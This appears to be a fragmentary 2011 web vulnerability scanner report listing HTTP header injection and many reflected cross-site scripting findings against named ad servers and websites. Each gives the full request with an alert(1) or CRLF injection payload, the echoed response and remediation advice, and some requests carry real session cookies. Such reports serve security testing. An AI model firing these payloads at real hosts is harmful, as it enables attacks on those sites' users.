Referer: http://htcwiki.wetpaint.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:00:08 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=8CB829864DFEBAF27580A4F19AA1591F; Path=/
Set-Cookie: wptrk="sn=c05ff
4e5b36c7f18&i=1"; Domain=wetpaint.com; Path=/
Set-Cookie: wpptrk=gpvc=1&ab=0; Domain=wetpaint.com; Expires=Sun, 05-Feb-2012 16:00:08 GMT; Path=/
Set-Cookie: wpptrk2d=coppa=; Domain=wetpaint.com; Expires=Mon, 07-Feb-2011 16:00:08 GMT; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:00:08 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript;charset=UTF-8
Content-Length: 142
The value of REST URL parameter 2 is copied into the Location response header. The payload f0d45%0d%0afc099dc298 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /servlet/f0d45%0d%0afc099dc298 HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /servlet/f0d45
fc099dc298/
Date: Sat, 05 Feb 2011 15:53:04 GMT
Connection: close
Content-Length: 91
The URL has moved to <a href="/servlet/f0d45 fc099dc298/">/servlet/f0d45 fc099dc298/</a>
4. Cross-site scripting (reflected)
There are 609 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68fe2"><script>alert(1)</script>fb7584e1aad was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=68fe2"><script>alert(1)</script>fb7584e1aad&t=SZ0ow4Nphk6QF4pEA%2fVMyWaMT7jB%2b6YWlSbtq1MTlw4wwHhN8C4NevvUFcvC6BcllnpjtVTlx6Lo00KykqDZYlCIlwCpxQ0RPpuZrKYlf%2bQ%3d%7csdNiQEA8dhzYJiYNhzK0rFlA6psa777s5ejGP%2flK%2bQo%3d HTTP/1.1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&mktid=83&mpid=1051202&fpid=-1&rnd=2858799619219382112&nu=n&sp=n Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=3011330574290390485; adImpCount=FM4QLcaMabkQsarcOBMTT_qd1v3GGeBcoJK0MOl0KG-Y481wEkFtGX7HudJA1SwJY9n9GIWJHDTqbWbTuEexfNzeQdD3uMEbsSJGoH6nZcvCzn_rbeUw4N91a2HFDwx7Wl6PMIbl8VoYkne2SJkXTcTcqhcYEXFRrx1COjt-xQdPBFgEFn33aBMbAqV_0XEIioGKZSAftgkVYZTzRayYVmmTJdkIn7237siDdt9MzJqJi5T6FYiHf9o35IlREqTNFveKpsZQ30qpNKi15RJt04BNhaXhDlSq6EvznmypgJEkna5GLuKLpEu7eZEeTMi7F6sK_rp2soXzwueUGRFartfze4TUjaNUIXjW8HpTdIXW8uxzXCZHw_1hR9tJint6dsPDEFhRxd_Mub3GEI1LN-tHiIt90vCIZrFIVkRcrTHWSuqW6r5ZIwUtscKD_QT9RhXOUlzX0--TPsid5EqGlKaR8fzj-CgEMyGy4iMXI1WxKbXh9CKgY6S3LP_zmj75AgqPmyW7n-K57XLwzviwi0UeS0QSNHqXIchkIsQCETGT3yD6yFHAIahzcKETB33UwCPq2GhFCxYySztyqVkKk9fqbN4-YU4FEz0wwkD5vsFOGK_87tDq8e92tNo34emrEgGEUj-NO1cCBiKRN0KNH1ftcOyrV1OLoU5x9aMp-92fSDdx8Pm4E6I95eyuD_EIQOJmu9RYL7YOIJ6DsZdIlrLgwokXGxtO8_jRpe316oYDuH7CMSEB_S7o6Xm3tvDBfH77IJVG0N6dycTdcjtOKF0Cz2TbSViJ-oT4nVLBUOQ7zE-OOnjPRQ6BZXJCY0oCMrkBfNspHfysXvb7GqOmGNAITbT7Z6AmMx12CVhoBV8PCKPJoslzeIPsOadDQ5GApTHEeUcb_20FLCe61hOZos4ND7pDMbh_Nz4asivfvnRRu_fmnuOn7vvqoBU15Zmhn2aVSJry2cIXXaBci8YswRWnz3-1lFmH8NpHbFKrPy3hBObtf8ALhKpons6mVN9Ng_E4yJzpnqztVh_CB-KMHlM4At-mEES-WC-9xjj3t3cnzJw50Wq6BglWv58k-98YkSbTm3kPOUdWBiWoLi0oN0AgeHAdeFjGHSfjDkMzE5p5e_oJDB2Um-liToPNlmN15FjrbRSBV8G9GwEgDofeTOxem0_gM
Apf3YWMEr3kQAQnXe4HjQMTBDROpzYRLGofXKwaWNtdj1-GtHzOUqyENh2k1W2pFwJOjkpENaGP0tqhG0BtDC_eTH_Ts10GvA6WhyC22lBHkEPeNKFx7RiTWcHRNLuEX2-svGHkdhG53xdJo9qHwXLy45nY7LSpUbn803gUXikBp5CFzTHxBLV0jIUUb9PGuTCtW-hvx86uIjCl7RrDpkAZSszkN92RjKcOSHyDTphfUd0ZqQTAbIYvZtNr_wQwmIEY35OpKNWhyGwNPlAh_ANj4laYRoTBJxnGQ7wgWZt0CSpxlrfASU5W2a6su59vlF-h6V4zet13tlPhRMEiyYm825vPff2nJDmVgFpIKs_vIo7sFsppJ43d8oTEgInxyFT6vScD8wD9aZjmMC0w6HS0HlWcNr1j-PhGS2ikng608Ubz0iz0TtbwhgQZq5IdyfSisA1KqAwL3sZErWVr76O0bqQTEPkhkBBP4vNeu_uKiDKKl73FedJ05pAh6qV14YUcXNrVmSSI1FzEzQ65n9aZSqRKUiLFvw0_FzJQi642bOf20jjwau1yNWbWc_OZc_OPEEY_dnkrDVdmeoMCTOxN_xl7C-3y_RTPHX8tA53fNzl8qfH897V8IhWPCe1DLrZ9lRQtTCZwINCJg6hyABA61hUJaqPVyX7fV7Pa1PW0-yYXb_USKuin2pZCaBr_uY_2UBH6Bm4UktJmd6sVQvXXEqhe9E5LsneRLFWbUdQszzXxD5egB584f5Iq0VaWXCofBTTX6PHG8K6lFCCN0TTnR1jCog1stnuLrLH_TLw0g_9l8j595C25K_O7nXuUqzkznnHJS2oIivO1MtzkhTD8tggahFLAwdtimGiAzgIbfwh3tPXiXBZiPEc6jmaSPplk32IRb7Tl08IFN1OghxmtWT_y47n5TtZS9Ky93uZuiaOzgh6RPqobZokxjCycBjwJJ-OqeZ3YCRoZ5XICuXWVHfipzGbbMT7XgVwScM8a1QBrHN9hJ559oPfWNXLGQYJF8WI3xWHXIXB86oJHZOjQy7IdFPhSTsF2yrOAh9s72IpPTbIy0ryOZR5kHQoGKZaDQPufKDCKOsAs5UyVIQTo0ztnk49jL0nNFaq4usSu0TQiqXjP7CIAd_5FtzMDApKZjTZ9VwWqS_hi3W5FLLAcz8HdwETYSzM0iqfAGlpVHegt_TIDru8ZVGlo2JchDi2BE0kETeswJqfjIM8eqB1CZXkSQ7Z_VjVnYvzBVNyB9AksqD2lQZb2X0IEqN843HNpf9LL79Gl1KBsoCUhcPx0GvFd6LDM_NesCTjn8qfPanRhqfFt_Mz5uEh2A3HFoGkf8ppxZxL6925r_GgrDoF5KcCR0z_dNX3kzjeRcgqW8BhR69hQhpeZrZnEJ52ohaD3WrTkTUj4YJ6Td6PLaDgaJxtMnnZrfAlG0SSD0cpxrho96Q5aYPi9en1l66z-sdlCvM2HwHHvukFOG1d5EaBIpvNzbIjvRqOmzYDhYzHqcbaWBj06fa97gFmB5jdUYj5pSK3CD2Yuk0PK5FYetxUklFsdind5sgdq4uZcD2KLx9Zf7jaxnwz6suaPAnsGTiQgiUvKmhf1LhrytQYKxDy-h4T29iDJXVr_vHZNnZTSMo3FOqO76V7e32Mz948gl-62XtaGUS8uw5NCpnBNXGUaigKHIg84ueIc4t5Yp3YWsvWh2i358DyJOyzgpnBHfTKfL-U_Busa7oEsjSep6DjzyTifPlN_P4smDk3kLq_iHqbXQ5svnKXdR0fKJFj2seLH8BbDFMsPiVsBIQ44v1dSgCalvY0FxkkJ5w0OZeWQP34jwLIAF168EspxmNyBZAxjbmEt8kjG7dRMykkE2LHXhz6x23r28D5B1-HnnnOalxwc8pVPIG67O2v9MtuGBypG0oO1sVM2Vbs7HFOP9G8F0R3RxUgEDCioFUEKPhCNOF99OExqDKIS0y-D3H8kAPjeIydjzyH2Ws7PK
yE1dGY4WEg1BMpUBtxwX2H-7BKKuqPq2iSXQ7keQevoGn3niEhwrkx3I523rYfTIHt_4ntge3wT6HrPHWBJpD6Hr91CxZq9sV9Jmp33y8raIDjGaQc_8c0sEToR_ODvxgcgJ32KFhukOoA2cRquiPMf-CiwpIi4ayv6yWP-tXJ__VAnBFQL8j9ZaHEtyQCLoYLPIaWZ3CmWGBp_xNH3WlqbXOyrf_ATBbMNQCTCxOAxrjPhFf5rtBKDWKm24urmdIW_ZXAbYCZmLsz6YiVpaNRjSC9cVWjph0vEeVDn94cCqpnjE0z1BuYxXU6aN8KvfgQRgY4ZaCnGHk-ja9faWwfL-_-bPH3YFMHRKzulr4fOZJphXH_Th5iLN0VczjS8Jh9TEFyiFtC1iUdTIWwbUQ3HeHZgtn1yA0PmWEs3TAjOPMDh8jx0WcV7eT-TG33S7CRXLm9kG5yXyNmxCrzJ; fc=8Kodsw1QIRNJBnpSjhgJ0uErbJkTJYsNaCBFpaSI5yP-4Y1aL5T0hqj7dZyIiRNIWMZgDtcnKM_xOWbKnaMIO3_WyzVPxgN3VkTg_cPuFqziwJJKZupkpjfaBrjFc6z7RfOX1MD02-o6SZ1b0c_HcUiZ1Q4B83ZCB0ZNq2R2Ygc; pf=vcPDWdxa5bRnzYCFna8dt7hwFpEjJFamBf-ed9eCgkru2q8_Jo62qDoNU1sRcsTDbsXLbP8cgvu5kdFpiCdvW34lLZyvKs0UYrWi2iSsDx65o3Pzwoz6403H7SSItm-xFnOkZRhnTAf1OsSeg86x6N9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5M6IAD_gZxI523_TIIsV7tK-AIolHB94EOuCprrHzPsXFXUf33lMkSWcP-I3s4DQm5; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15011%7C15011%7C15009%7Cundefined%7C15011%7C15011%7C15011%7C15011%7C15011%7C15011%7C15011%7C14983%7C15011%7C15003; rv=1
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Thu, 04-Aug-2011 15:59:34 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 15:59:33 GMT
Content-Length: 546
4.2. http://ads.addynamix.com/creative/2-2126953-88j [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.addynamix.com
Path: /creative/2-2126953-88j
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79ca0'-alert(1)-'7a99b6b9948 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /creative/2-2126953-88j??79ca0'-alert(1)-'7a99b6b9948=1 HTTP/1.1
Host: ads.addynamix.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UC=1.0.20050_0_1106.0; PI2126953_85=I4d4d644cJ2K2L0M2N1O15180
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:34 GMT
Server: Apache
Server-Index: i1
P3P: policyref="http://banners.pennyweb.com/w3c/p3p.xml",CP="NON STP DSP COR CUR TAI OUR STA"
Pragma: no-cache
Cache-Control: no-store,no-cache
Set-Cookie: PI2126953_88=I4d4d73e6J63b0K77064L2eM1960dN1O15180; expires=Sun, 06-Feb-2011 15:59:34 GMT; path=/; domain=ads.addynamix.com
Content-Length: 734
Connection: close
Content-Type: text/html
Expires: Sat, 05 Feb 2011 15:59:34 GMT
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 5ca84<script>alert(1)</script>e6063e28591 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads/ads.js?uid=W25t6coj820hSGmI5ca84<script>alert(1)</script>e6063e28591 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=223547500743A002098EB099848151AA; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 15:59:33 GMT
Connection: close
The value of the kvq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bb3a'-alert(1)-'39269acb9b9 was submitted in the kvq parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;adiframe=y;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=2bb3a'-alert(1)-'39269acb9b9 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
function __flushCode() { if (!__bCodeFlushed) { var span = parent.document.createElement("SPAN" ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/5132/1229906/0/225/AdId=1423870;BnId=9;itime=921573158;nodecode=yes;link=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=2bb3a'-alert(1)-'39269acb9b9http://www.autotrader.com/hornav/trader/index.jsp?LNX=SYCVIDSCI728" target="_blank"> ...[SNIP]...
4.5. http://adserver.adtechus.com/addyn/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5c4f'-alert(1)-'8df45306b31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;adiframe=y;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=&e5c4f'-alert(1)-'8df45306b31=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
function __flushCode() { if (!__bCodeFlushed) { var span = parent.document.createElement("SPAN" ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/5132/1229906/0/225/AdId=1423870;BnId=10;itime=921573573;nodecode=yes;link=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=&e5c4f'-alert(1)-'8df45306b31=1http://www.autotrader.com/hornav/trader/index.jsp?LNX=SYCVIDGLITT728" target="_blank"> ...[SNIP]...
The value of the alias request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db26e'-alert(1)-'0d3ee1d5280 was submitted in the alias parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=225700573b6576db26e'-alert(1)-'0d3ee1d5280 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 302
4.7. http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adserver.adtechus.com
Path: /addyn/3.0/5242.1/1199874/0/16/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87d4c'-alert(1)-'a66e2a6ecfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=225700573b6576&87d4c'-alert(1)-'a66e2a6ecfb=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 305
The value of the alias request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d27a"-alert(1)-"23d787d5a6f was submitted in the alias parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200349/0/225/ADTECH;alias=InformationWeek_Software_HP_Top_728x90;key=225700573b65766d27a"-alert(1)-"23d787d5a6f HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 1454
4.9. http://adserver.adtechus.com/addyn/3.0/5242.1/1200349/0/225/ADTECH [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adserver.adtechus.com
Path: /addyn/3.0/5242.1/1200349/0/225/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b1ea"-alert(1)-"2fbf835ceb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200349/0/225/ADTECH;alias=InformationWeek_Software_HP_Top_728x90;key=225700573b6576&1b1ea"-alert(1)-"2fbf835ceb6=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19251
function __flushCode() { if (!__bCodeFlushed) { var span = parent.document.createElement("SPAN" ...[SNIP]... ICKVAR[0]?AT_CLICKVAR[0]:"clickTAG"; var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5242/1201431/0/225/AdId=1283446;BnId=5;itime=920485366;key=225700573b6576&1b1ea"-alert(1)-"2fbf835ceb6=1;nodecode=yes;link=") + escape(AT_CLICK); var AT_FLASHVARSSTR= ""; // if use microsite, dont add the first parameter if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserv ...[SNIP]...
The value of the alias request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea3c6'-alert(1)-'ba2d61c4899 was submitted in the alias parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH;alias=InformationWeek_Software_HP_Bottom_728x90;key=225700573b6576ea3c6'-alert(1)-'ba2d61c4899 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 328
